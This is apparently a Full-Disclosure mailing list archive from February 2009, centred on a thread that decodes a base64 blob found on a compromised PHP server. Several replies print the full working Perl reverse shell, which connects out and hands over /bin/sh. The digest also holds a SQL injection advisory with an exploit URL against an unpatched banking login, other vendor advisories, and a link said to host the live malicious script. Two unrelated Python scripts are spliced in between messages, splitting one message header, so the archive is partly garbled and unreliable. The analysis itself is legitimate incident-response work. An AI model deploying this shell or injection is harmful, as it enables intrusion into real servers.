I'll post the rest of my findings on here asap. i'm looking into an old compromised machine. this is nothing new.. whoever mentioned the r57 shell, you're probably right as the script connects to a remote box @ port 11457. this is r57 behaviour.

i also found a copy of the same script i'm dissecting on someone else's box, you can check it out here:

http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php

in my case, a bunch of php files were modified. i'll zip everything up and host it so you can all analyze...

thx,

sr. aka "fabrizio siciliano"

On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro wrote:
> "Sr."
>
> This is base64 encoded.
>
> 2009/2/10 sr. :
>> can anyone tell me what encoding this is?
>>
>> this has to do with old php 4.x.x version with magic quotes enabled.
>> i'm just trying to figure out what the connect back code does.
>>
>> any input is much appreciated.
>>
>> thx,
>>
>> sr.
>
> --
> Regards,
> Gustavo Castro Puig.

From f.bianchino at gmail.com Tue Feb 10 19:54:56 2009
From: f.bianchino at gmail.com (Francesco Bianchino)
Date: Tue, 10 Feb 2009 20:54:56 +0100
Subject: [Full-disclosure] Craft Silicon Banking@Home SQL Injection
Message-ID: <6886de5a0902101154i5264cd28wf3b59e016eccc0ac@mail.gmail.com>

Craft Silicon Banking at Home SQL Injection
***********************************************************************
Author: Francesco Bianchino
Email: f.bianchino [at] gmail.com
Title: Craft Silicon Banking at Home SQL Injection
Product: Banking at Home - Net Banking
Versions Vulnerable: 2.1 and below
Vendor: Craft Silicon (www.craftsilicon.com)
***********************************************************************

Summary

Banking at Home is a home banking application that lets customers access their account information over the web. The application stores its data in a database management system that uses Structured Query Language (SQL) as its data access standard.

***********************************************************************

Vulnerability Details

The login page of Net Banking is vulnerable to SQL injection because input validation is missing. An attacker can inject SQL code into the username and password fields and alter the login procedure. The flaw is a classic error-based injection, easy to exploit, and it can be used to take control of the entire server. Authentication bypass is possible with a valid username and no password; alternatively, the user table can be modified arbitrarily.

***********************************************************************

Exploit

http://www.example.com/document_root/Login.asp?LoginName='Some_SQL_Stuff&Password=&submit=Login

***********************************************************************

Solution

At the time of writing this advisory there is no solution. I notified Craft Silicon in November 2008 and have received no answer so far.

***********************************************************************

Credits

Discovered by Francesco Bianchino.
From juha-matti.laurio at netti.fi Tue Feb 10 20:04:47 2009
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Tue, 10 Feb 2009 22:04:47 +0200 (EET)
Subject: [Full-disclosure] connect back PHP hack
Message-ID: <28908282.990371234296288491.JavaMail.juha-matti.laurio@netti.fi>

This triggers AV as Backdoor.PHP.RST.I etc.

Juha-Matti

From jklemenc at fnal.gov Tue Feb 10 19:45:26 2009
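As an added example, not code posted by anyone in this thread: a small defensive scanner of the kind a responder might run over a web root like the one sr. describes (modified PHP files, before AV names the sample as Juha-Matti reports). It picks out long base64 string literals assigned to PHP variables (the `$back_connect="..."` shape), decodes them strictly, tolerates the line-wrapping and `> ` quote markers the blob acquired in the mails, and flags decoded text that carries several of the reverse-shell markers seen in the decoded Perl. The sample PHP fragment and payload are constructed here (the payload holds marker lines with `...` in place of arguments, not the script from the thread); the 40-character floor and the three-indicator threshold are arbitrary choices.

```python
"""Find base64 string literals in PHP source that decode to reverse-shell markers.

Added example for this thread, not code posted by any participant. The sample
PHP fragment and the payload below are constructed for the example.
"""
import base64
import re
import textwrap

# Tokens whose co-occurrence in decoded text points at a Perl connect-back
# shell of the kind decoded in the thread: Socket use, a connect(), stdio
# redirected into the socket, and a shell spawned via system().
INDICATORS = ("use Socket", "socket(", "connect(", ">&SOCKET", "/bin/sh", "system(")

# A PHP variable assigned a long base64 literal, e.g. $back_connect="...".
# Whitespace and '>' are allowed inside the literal so a blob pasted out of a
# quoted mail (wrapped, with '> ' prefixes) still matches. 40 is an arbitrary floor.
B64_ASSIGN = re.compile(r'\$(\w+)\s*=\s*["\']([A-Za-z0-9+/\s>]{40,}={0,2})["\']')


def normalize_wrapped(blob: str) -> str:
    """Undo mail-client wrapping: drop whitespace and '>' quote markers."""
    return re.sub(r"[\s>]+", "", blob)


def decode_text(blob: str):
    """Strictly decode base64; return the text only if it is printable ASCII."""
    try:
        raw = base64.b64decode(normalize_wrapped(blob), validate=True)
        text = raw.decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None


def scan_php(source: str, threshold: int = 3):
    """Return a finding for each literal whose decoded text has >= threshold markers."""
    findings = []
    for match in B64_ASSIGN.finditer(source):
        name, blob = match.group(1), match.group(2)
        text = decode_text(blob)
        if text is None:
            continue  # binary data or not base64 at all: not this case
        hits = [tok for tok in INDICATORS if tok in text]
        if len(hits) >= threshold:
            findings.append({
                "variable": name,
                "indicators": hits,
                "first_line": text.splitlines()[0],
            })
    return findings


def wrap_like_mail(blob: str, width: int = 60) -> str:
    """Re-wrap a literal the way the quoted mails in the thread did ('> ' per line)."""
    return "\n> ".join(textwrap.wrap(blob, width))


# Constructed payload: marker lines with '...' in place of arguments, so the
# heuristic recognises it but it is not a runnable script.
SAMPLE_PAYLOAD = base64.b64encode(
    b"#!/usr/bin/perl\r\nuse Socket;\r\nsocket(...);\r\nconnect(...);\r\n"
    b'open(STDOUT, ">&SOCKET");\r\nsystem("/bin/sh");\r\n'
).decode()

# Constructed benign literal: long base64 that decodes to plain text with no markers.
BENIGN = base64.b64encode(b"This is a perfectly ordinary configuration string.").decode()

# Constructed PHP fragment in the shape of the modified files from the thread.
SAMPLE_PHP = (
    "<?php\n"
    f'$site_motd = "{BENIGN}";\n'
    f'$back_connect="{SAMPLE_PAYLOAD}";\n'
    "?>\n"
)

# The same literal as it looks when pasted out of a quoted mail.
WRAPPED_PHP = f'$back_connect="{wrap_like_mail(SAMPLE_PAYLOAD)}";'

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP) + scan_php(WRAPPED_PHP):
        print(f"${finding['variable']}: {finding['first_line']!r} "
              f"matched {finding['indicators']}")
```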
From: jklemenc at fnal.gov (Joe Klemencic)
Date: Tue, 10 Feb 2009 13:45:26 -0600
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <4991D956.1080604@fnal.gov>

It is a simple Base64 encoding containing a Perl script:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

sr. wrote:
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

From leszek.mis at gmail.com Tue Feb 10 19:31:18 2009
From: leszek.mis at gmail.com (crony)
Date: Tue, 10 Feb 2009 20:31:18 +0100
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID:

Hey.

It's base64 encoded. Here is the decoded output:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

2009/2/10 sr.
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

--
Regards,
Leszek Miś

Nothing is secure, paranoia is your friend.

From joren at streamingedge.com Tue Feb 10 19:56:21 2009
From: joren at streamingedge.com (Joren Gaucher)
Date: Tue, 10 Feb 2009 14:56:21 -0500
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <4991DBE5.7050202@streamingedge.com>

base64 decode: (easy to tell with the padding of '==')

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

J

sr. wrote:
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

From mathewm at sdf.lonestar.org Tue Feb 10 20:34:06 2009
From: mathewm at sdf.lonestar.org (mathewm at sdf.lonestar.org)
Date: Wed, 11 Feb 2009 07:34:06 +1100 (EST)
Subject: [Full-disclosure] connect back PHP hack
Message-ID:

sr. wrote:
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

Base64. It decodes as:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

HTH

From nion at debian.org Tue Feb 10 20:52:40 2009
From: nion at debian.org (Nico Golde)
Date: Tue, 10 Feb 2009 21:52:40 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1720-1] New TYPO3 packages fix several vulnerabilities
Message-ID: <20090210205240.BB0AA2B3E2A@finlandia.home.infodrom.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1720-1                    security at debian.org
http://www.debian.org/security/                             Martin Schulze
February 10th, 2009                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : typo3-src
Vulnerability  : several
Problem type   : remote
Debian-specific: no
Debian Bug     : 514713

Several remote vulnerabilities have been discovered in the TYPO3 web content management framework.

Marcus Krause and Michael Stucki from the TYPO3 security team discovered that the jumpUrl mechanism discloses secret hashes enabling a remote attacker to bypass access control by submitting the correct value as a URL parameter and thus being able to read the content of arbitrary files.

Jelmer de Hen and Dmitry Dulepov discovered multiple cross-site scripting vulnerabilities in the backend user interface allowing remote attackers to inject arbitrary web script or HTML.

As it is very likely that your encryption key has been exposed, we strongly recommend changing your encryption key via the install tool after installing the update.

For the stable distribution (etch) these problems have been fixed in version 4.0.2+debian-8.

For the testing distribution (lenny) these problems have been fixed in version 4.2.5-1+lenny1.

For the unstable distribution (sid) these problems have been fixed in version 4.2.6-1.

We recommend that you upgrade your typo3 package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-8.dsc
    Size/MD5 checksum:      618 8a7ebb8edf133224fc8c552c12b6cb3d
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-8.diff.gz
    Size/MD5 checksum:    24943 588b00a669ba0db62551749d9379a0ce
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian.orig.tar.gz
    Size/MD5 checksum:  7683527 be509391b0e4d24278c14100c09dc673

Architecture independent components:

  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src-4.0_4.0.2+debian-8_all.deb
    Size/MD5 checksum:  7677310 456187cb35360f2f9b35ab54fb8d6db5
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3_4.0.2+debian-8_all.deb
    Size/MD5 checksum:    77252 87ceec7498d3df3436dc0a663088d2b6

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJkekUW5ql+IAeqTIRAmcrAKC4kFo9JIPMxth84ZxxmMSe5FIGaACgoXkp
6di1jqOPGBzLHH3TPYKca2o=
=kmvS
-----END PGP SIGNATURE-----

From clement.dupuis at gmail.com Tue Feb 10 20:41:36 2009
From: clement.dupuis at gmail.com (Clement Dupuis)
Date: Wed, 11 Feb 2009 00:41:36 +0400
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <491636e50902101241w298519ecnf7f92401784bfefa@mail.gmail.com>

It is base64 encoding. The two dashes at the end give it away.

Something similar to:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

I used the free decoder encoder at:
http://ostermiller.org/calc/encode.html

Take care

Clement

On Tue, Feb 10, 2009 at 10:23 PM, sr. wrote:
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

From zdi-disclosures at tippingpoint.com Tue Feb 10 20:56:41 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Tue, 10 Feb 2009 14:56:41 -0600
Subject: [Full-disclosure] ZDI-09-011: Microsoft Internet Explorer CFunctionPointer Memory Corruption Vulnerability
Message-ID:

ZDI-09-011: Microsoft Internet Explorer CFunctionPointer Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-011
February 10, 2009

-- CVE ID:
CVE-2009-0075

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6753. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists in the handling of document objects. When an object is appended and deleted in a specific order, memory corruption occurs. Successful exploitation leads to remote compromise of the affected system under the credentials of the currently logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx

-- Disclosure Timeline:
2008-09-23 - Vulnerability reported to vendor
2009-02-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From zdi-disclosures at tippingpoint.com Tue Feb 10 20:57:58 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Tue, 10 Feb 2009 14:57:58 -0600
Subject: [Full-disclosure] ZDI-09-012: Microsoft Internet Explorer Malformed CSS Memory Corruption
Message-ID:

ZDI-09-012: Microsoft Internet Explorer Malformed CSS Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-012
February 10, 2009

-- CVE ID:
CVE-2009-0076

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6761. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists when processing, in XHTML strict mode, a CSS stylesheet containing a specific combination of style directives, one of which must be a 'zoom'. The fault in processing results in a memory corruption vulnerability which can be leveraged to execute arbitrary code under the context of the current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx

-- Disclosure Timeline:
2008-10-15 - Vulnerability reported to vendor
2009-02-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Sam Thomas of eshu.co.uk

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From staticrez at gmail.com Tue Feb 10 22:05:34 2009
From: staticrez at gmail.com (sr.)
Date: Tue, 10 Feb 2009 17:05:34 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
Message-ID: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>

anybody else seeing this?

can't get to metasploit because it's currently resolving to 127.0.0.1

sr.

From staticrez at gmail.com Tue Feb 10 22:11:47 2009
From: staticrez at gmail.com (sr.)
Date: Tue, 10 Feb 2009 17:11:47 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: <1234303788.19641.15.camel@n1-14-96.dhcp.drexel.edu>
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <1234303788.19641.15.camel@n1-14-96.dhcp.drexel.edu>
Message-ID: <5d80962a0902101411m378d7465q33a9d3cef1abdc17@mail.gmail.com>

thanks, metasploit.org is up. reading the blog now...

On Tue, Feb 10, 2009 at 5:09 PM, Harry Hoffman wrote:
> yep,
>
> [hhoffman at localhost ~]$ host metasploit.com
> metasploit.com has address 127.0.0.1
> metasploit.com mail is handled by 1 bogus.metasploit.com.
> metasploit.com mail is handled by 20 slug.metasploit.com.
> metasploit.com mail is handled by 30 core.metasploit.com.
>
> [hhoffman at localhost ~]$ host -t NS metasploit.com
> metasploit.com name server dns02.metasploit.com.
> metasploit.com name server dns01.metasploit.com.
>
> [hhoffman at localhost ~]$ host dns02.metasploit.com
> dns02.metasploit.com has address 66.240.213.81
>
> [hhoffman at localhost ~]$ host 66.240.213.81
> 81.213.240.66.in-addr.arpa domain name pointer core.metasploit.com.
>
>
> On Tue, 2009-02-10 at 17:05 -0500, sr. wrote:
>> anybody else seeing this?
>>
>> can't get to metasploit because it's currently resolving to 127.0.0.1
>>
>> sr.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>

From vigilantgregorius at gmail.com Tue Feb 10 22:08:38 2009
From: vigilantgregorius at gmail.com (Miller Grey)
Date: Tue, 10 Feb 2009 16:08:38 -0600
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>
Message-ID:

DDOS

On Tue, Feb 10, 2009 at 4:05 PM, sr. wrote:
> anybody else seeing this?
>
> can't get to metasploit because it's currently resolving to 127.0.0.1
>
> sr.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/683882fe/attachment.html

From jamie at canonical.com Wed Feb 11 01:49:31 2009
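As an added check, not part of the metasploit.com thread above: the host(1) output Harry Hoffman quoted is exactly what gets pasted into a triage script. The block below parses those lines (embedded as a constructed snapshot; nothing does a live lookup) and flags answers that land in loopback, private or otherwise unroutable space. The parser, the rules and the wording of the findings are mine.

```python
"""Audit host(1) output for public names that resolve into non-routable space.

Added example, not part of the thread. HOST_OUTPUT is a constructed snapshot
of the host(1) lines quoted in the thread; the parser and the rules below
are my own, and nothing here performs a live DNS query.
"""
import ipaddress
import re

HOST_OUTPUT = """\
metasploit.com has address 127.0.0.1
metasploit.com mail is handled by 1 bogus.metasploit.com.
metasploit.com mail is handled by 20 slug.metasploit.com.
metasploit.com mail is handled by 30 core.metasploit.com.
metasploit.com name server dns02.metasploit.com.
metasploit.com name server dns01.metasploit.com.
dns02.metasploit.com has address 66.240.213.81
81.213.240.66.in-addr.arpa domain name pointer core.metasploit.com.
"""

ADDRESS_LINE = re.compile(r"^(\S+) has (?:IPv6 )?address (\S+)$")
NS_LINE = re.compile(r"^(\S+) name server (\S+)$")


def parse_host_output(text):
    """Return ({name: [addresses]}, {zone: [nameservers]}); other lines are ignored."""
    addrs, nameservers = {}, {}
    for line in text.splitlines():
        line = line.strip()
        m = ADDRESS_LINE.match(line)
        if m:
            addrs.setdefault(m.group(1), []).append(m.group(2))
            continue
        m = NS_LINE.match(line)
        if m:
            nameservers.setdefault(m.group(1), []).append(m.group(2).rstrip("."))
    return addrs, nameservers


def why_unusable(addr):
    """Reason an address cannot be a reachable public endpoint, or None.

    Order matters: 127.0.0.1 is also 'private' to the ipaddress module, so
    the more specific loopback label is tested first.
    """
    ip = ipaddress.ip_address(addr)
    for attr in ("is_loopback", "is_unspecified", "is_link_local",
                 "is_multicast", "is_private", "is_reserved"):
        if getattr(ip, attr):
            return attr[3:].replace("_", "-")
    return None


def audit(text):
    """Findings for names whose answers are unusable; an empty list means clean."""
    addrs, nameservers = parse_host_output(text)
    findings = []
    for name, ips in addrs.items():
        bad = {ip: why_unusable(ip) for ip in ips}
        bad = {ip: why for ip, why in bad.items() if why}
        if bad:
            scope = "all" if len(bad) == len(ips) else "some"
            detail = ", ".join(f"{ip} ({why})" for ip, why in bad.items())
            findings.append(f"{name}: {scope} A records unusable: {detail}")
    # If the apex is dead but an authoritative server is reachable, the next
    # step is to ask that server directly and compare with the recursive answer.
    for zone, servers in nameservers.items():
        if zone in addrs and all(why_unusable(ip) for ip in addrs[zone]):
            reachable = [ns for ns in servers
                         if ns in addrs and not any(why_unusable(ip) for ip in addrs[ns])]
            if reachable:
                findings.append(f"{zone}: authoritative {', '.join(reachable)} is reachable; "
                                f"query it directly to tell a zone change from a poisoned cache")
    return findings


if __name__ == "__main__":
    for finding in audit(HOST_OUTPUT):
        print(finding)
```

A loopback apex with a reachable authoritative server is the cue to query that server directly (`dig @dns02.metasploit.com metasploit.com A`) and compare with what the recursive resolver returned: identical answers mean the zone itself carries 127.0.0.1, different answers point at the resolver path. Treat the result as an alert rather than a block rule; some developer-convenience domains publish loopback addresses on purpose.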
From: jamie at canonical.com (Jamie Strandboge)
Date: Tue, 10 Feb 2009 19:49:31 -0600
Subject: [Full-disclosure] [USN-717-3] Firefox vulnerabilities
Message-ID: <20090211014931.GC3543@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-717-3             February 11, 2009
firefox vulnerabilities
CVE-2008-5510, CVE-2009-0357
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox                         1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1

After a standard system upgrade you need to restart Firefox to effect
the necessary changes.

Details follow:

Kojima Hajime discovered that Firefox did not properly handle an escaped
null character. An attacker may be able to exploit this flaw to bypass
script sanitization. (CVE-2008-5510)

Wladimir Palant discovered that Firefox did not restrict access to cookies
in HTTP response headers. If a user were tricked into opening a malicious
web page, a remote attacker could view sensitive information.
(CVE-2009-0357) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1.diff.gz Size/MD5: 184569 201540f2560ee07d0a7b30d367ce41bd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1.dsc Size/MD5: 1800 e8a6f2726dbc06dade12a0ebc19c7fae http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j.orig.tar.gz Size/MD5: 48454140 496d1a74f2a98e8983737a874a9db29f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_all.deb Size/MD5: 53638 9a18c7067527411eababced232354e7c http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_all.deb Size/MD5: 52746 fa9d687831d30b8f8ef39da07c7a1ff4 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 47675616 d3b427dc0d4db0eebb5f3147ce3d29bb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 3045278 1683527a70cdf674f7b711ad559db6b4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 85802 d88ad731cdfc825cb1f88ad91d8fbe2d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 9522850 b6d18064354f4e733894ce40fe048be4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 228116 90343b0a500020dd643c049164ba9c93 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 165590 
